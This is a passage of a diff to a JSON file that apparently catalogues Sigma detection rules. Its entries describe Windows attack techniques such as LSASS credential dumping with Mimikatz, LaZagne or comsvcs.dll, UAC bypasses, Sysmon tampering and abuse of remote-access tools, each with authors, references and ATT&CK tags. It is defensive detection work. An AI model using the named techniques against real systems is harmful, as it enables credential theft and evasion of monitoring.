memory via suspicious access masks. 
This is typical for credentials dumping tools", - "meta": { - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update)", - "creation_date": "2017/02/16", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason; please add more filters" - ], - "filename": "proc_access_win_cred_dump_lsass_access.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" - ] - }, - "uuid": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", - "value": "Credential Dumping Tools Accessing LSASS Memory" - }, - { - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "meta": { - "author": "Christian Burkard, Tim Shelton", - "creation_date": "2021/07/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106" - ] - }, - "uuid": "3f3f3506-1895-401b-9cc3-e86b16e630d0", - "value": "Direct Syscall of NtOpenProcess" - }, - { - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", "meta": { "author": "Florian Roth", - "creation_date": "2022/09/07", + "creation_date": "2017/04/15", "falsepositive": [ "Unknown" ], - "filename": "proc_access_win_hack_sysmonente.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html", - "https://github.com/codewhitesec/SysmonEnte/", - "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ] - }, - "uuid": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", - "value": "SysmonEnte Usage" - }, - { - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "meta": { - "author": "Bhabesh Raj (rule), @thefLinkk", - "creation_date": "2022/06/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_handlekatz_lsass_access.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/codewhitesec/HandleKatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_handlekatz_lsass_access.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" - ] 
- }, - "uuid": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "value": "HandleKatz Duplicating LSASS Handle" - }, - { - "description": "Detects suspect access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "meta": { - "author": "Tim Burrell", - "creation_date": "2020/01/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_invoke_phantom.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/hlldz/Invoke-Phant0m", - "https://twitter.com/timbmsft/status/900724491076214784", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ] - }, - "uuid": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", - "value": "Suspect Svchost Memory Asccess" - }, - { - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "meta": { - "author": "Bhabesh Raj, Jonhnathan Ribeiro", - "creation_date": "2020/09/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml", - "level": "critical", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/bh4b3sh/status/1303674603819081728", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lazagne_cred_dump_lsass_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" - ] - }, - "uuid": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "value": "Credential Dumping by LaZagne" - }, - { - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml", - "level": 
"high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/connormcgarr/LittleCorporal", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" - ] - }, - "uuid": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", - "value": "LittleCorporal Generated Maldoc Injection" - }, - { - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "meta": { - "author": "oscd.community, Dmitry Uchakin", - "creation_date": "2020/10/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/", - "https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_load_undocumented_autoelevated_com_interface.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "fb3722e4-1a06-46b6-b772-253e2e7db933", - "value": "Load Undocumented Autoelevated COM Interface" - }, - { - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/10/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml", - "level": "critical", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/shantanukhande/status/1229348874298388484", - 
"https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "value": "Lsass Memory Dump via Comsvcs DLL" - }, - { - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "meta": { - "author": "Samir Bousseaden, Michael Haag", - "creation_date": "2019/04/03", - "falsepositive": [ - "False positives are present when looking for 0x1410. Exclusions may be required." - ], - "filename": "proc_access_win_lsass_memdump.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", - "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ] - }, - "uuid": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "value": "LSASS Memory Dump" - }, - { - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/10", - "falsepositive": [ - "Unlikely, since these tools shouldn't access lsass.exe 
at all" - ], - "filename": "proc_access_win_lsass_memdump_evasion.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_xpn_/status/1491557187168178176", - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", - "https://twitter.com/mrd0x/status/1460597833917251595", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ] - }, - "uuid": "4be8b654-0c01-4c9d-a10c-6b28467fc651", - "value": "LSASS Access from White-Listed Processes" - }, - { - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/10", - "falsepositive": [ - "Rare programs that contain the word dump in their name and access lsass" - ], - "filename": "proc_access_win_lsass_memdump_indicators.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_xpn_/status/1491557187168178176", - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ] - }, - "uuid": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", - "value": "LSASS Memory Access by Tool Named Dump" - }, - { - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "meta": { - "author": 
"Florian Roth", - "creation_date": "2012/06/27", - "falsepositive": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" - ], - "filename": "proc_access_win_lsass_werfault.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_werfault.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ] - }, - "uuid": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", - "value": "WerFault Accassing LSASS" - }, - { - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "meta": { - "author": "John Lambert (tech), Florian Roth (rule)", - "creation_date": "2017/03/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/JohnLaTwC/status/837743453039534080", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", - "value": "Malware Shellcode in Verclsid Target Process" - }, - { - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "meta": { - "author": "Patryk Prauze - ING Tech", - "creation_date": "2019/05/20", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml", - "level": "high", - "logsource.category": "process_access", - 
"logsource.product": "windows", - "refs": [ - "https://pentestlab.blog/2018/05/15/lateral-movement-winrm/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_mimikatz_trough_winrm.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" - ] - }, - "uuid": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "value": "Mimikatz through Windows Remote Management" - }, - { - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/08/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml", - "level": "critical", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/skelsec/pypykatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_pypykatz_cred_dump_lsass_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", - "value": "Credential Dumping by Pypykatz" - }, - { - "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/13", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason" - ], - "filename": "proc_access_win_rare_proc_access_lsass.yml", - "level": "medium", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - 
"https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ] - }, - "uuid": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", - "value": "Rare GrantedAccess Flags on LSASS Access" - }, - { - "description": "Detects process access to LSASS memory with suspicious access flags", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/22", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason" - ], - "filename": "proc_access_win_susp_proc_access_lsass.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ] - }, - "uuid": "a18dd26b-6450-46de-8c91-9659150cf088", - "value": "Suspicious GrantedAccess Flags on LSASS Access" - }, - { - "description": "Detects process access to LSASS memory with suspicious access 
flags and from a suspicious folder", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/27", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason" - ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ] - }, - "uuid": "fa34b441-961a-42fa-a100-ecc28c886725", - "value": "LSASS Access from Program in Suspicious Folder" - }, - { - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "meta": { - "author": "Florent Labouyrie", - "creation_date": "2021/04/30", - "falsepositive": [ - "Non identified legit exectubale" - ], - "filename": "proc_access_win_svchost_cred_dump.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_cred_dump.yml" - ], - "tags": [ - "attack.t1548" - ] - }, - "uuid": "174afcfa-6e40-4ae9-af64-496546389294", - "value": "SVCHOST Credential Dump" - }, - { - "description": "Detects the pattern of UAC Bypass using a WoW64 
logger DLL hijack (UACMe 30)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", - "value": "UAC Bypass Using WOW64 Logger DLL Hijack" - }, - { - "description": "7-Zip through 21.07 on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.", - "meta": { - "author": "frack113", - "creation_date": "2022/04/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_7zip_cve_2022_29072.yml", + "filename": "proc_creation_win_susp_control_dll_load.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/kagancapar/CVE-2022-29072", - "https://twitter.com/kagancapar/status/1515219358234161153", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_cve_2022_29072.yml" - ], - "tags": [ - "cve.2022.29072" - ] - }, - "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", - "value": "Suspicious 7zip Subprocess" - }, - { - "description": "Detection of unusual child processes by different system processes", - "meta": { - "author": "Semanur Guneysu @semanurtg, oscd.community", - "creation_date": "2020/10/28", - "falsepositive": [ - "Unknown" - ], - "filename": 
"proc_creation_win_abusing_debug_privilege.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_debug_privilege.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ] - }, - "uuid": "d522eca2-2973-4391-a3e0-ef0374321dae", - "value": "Abused Debug Privilege by Arbitrary Parent Processes" - }, - { - "description": "Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.", - "meta": { - "author": "Sreeman", - "creation_date": "2020/09/29", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_abusing_windows_telemetry_for_persistence.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_windows_telemetry_for_persistence.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112", - "attack.t1053" - ] - }, - "uuid": "f548a603-c9f2-4c89-b511-b089f7e94549", - "value": "Abusing Windows Telemetry For Persistence" - }, - { - "description": "Accesschk is an access and privilege audit tool developed by SysInternal and often being used by attacker to verify privileges", - "meta": { - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community, 
Nasreddine Bencherchali (modified)", - "creation_date": "2020/10/13", - "falsepositive": [ - "System administrator Usage" - ], - "filename": "proc_creation_win_accesschk_usage_after_priv_escalation.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", - "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", - "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", - "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "c625d754-6a3d-4f65-9c9a-536aea960d37", - "value": "Accesschk Usage To Check Privileges" - }, - { - "description": "Detects the use of Advanced IP Scanner. 
Seems to be a popular tool for ransomware groups.", - "meta": { - "author": "@ROxPinTeddy, Nasreddine Bencherchali", - "creation_date": "2020/05/12", - "falsepositive": [ - "Legitimate administrative use" - ], - "filename": "proc_creation_win_advanced_ip_scanner.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" - ] - }, - "uuid": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", - "value": "Advanced IP Scanner" - }, - { - "description": "Detects the use of Advanced Port Scanner.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2021/12/18", - "falsepositive": [ - "Legitimate administrative use", - "Tools with similar commandline (very rare)" - ], - "filename": "proc_creation_win_advanced_port_scanner.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" - ] - }, - "uuid": 
"54773c5f-f1cc-4703-9126-2f797d96a69d", - "value": "Advanced Port Scanner" - }, - { - "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", - "meta": { - "author": "frack113", - "creation_date": "2021/09/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_alternate_data_streams.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_alternate_data_streams.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", - "value": "Execute From Alternate Data Streams" - }, - { - "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", - "meta": { - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", - "value": "Always Install Elevated MSI Spawned Cmd And Powershell" - }, - { - "description": "Detects Windows Installer 
service (msiexec.exe) trying to install MSI packages with SYSTEM privilege",
- "meta": {
- "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community",
- "creation_date": "2020/10/13",
- "falsepositive": [
- "System administrator usage",
- "Anti virus products"
- ],
- "filename": "proc_creation_win_always_install_elevated_windows_installer.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_windows_installer.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1548.002"
- ]
- },
- "uuid": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770",
- "value": "Always Install Elevated Windows Installer"
- },
- {
- "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/02/11",
- "falsepositive": [
- "Legitimate use"
- ],
- "filename": "proc_creation_win_anydesk.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ]
- },
- "uuid": "b52e84a3-029e-4529-b09b-71d19dd27e94",
- "value": "Use of Anydesk Remote Access Software"
- },
- {
- "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/28",
- "falsepositive": [
- "Legitimate piping of the password to anydesk",
- "Some FP could occure with similar tools that uses the same command line '--set-password'"
- ],
- "filename": "proc_creation_win_anydesk_piped_password_via_cli.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://redcanary.com/blog/misbehaving-rats/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ]
- },
- "uuid": "b1377339-fda6-477a-b455-ac0923f9ec2c",
- "value": "AnyDesk Inline Piped Password"
- },
- {
- "description": "Detects AnyDesk Remote Desktop silent installation. 
Which can be used by attackers to gain remote access.",
- "meta": {
- "author": "Ján Trenčanský",
- "creation_date": "2021/08/06",
- "falsepositive": [
- "Legitimate deployment of AnyDesk"
- ],
- "filename": "proc_creation_win_anydesk_silent_install.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20",
- "https://support.anydesk.com/Automatic_Deployment",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_silent_install.yml"
- ],
- "tags": [
- "attack.command_and_control",
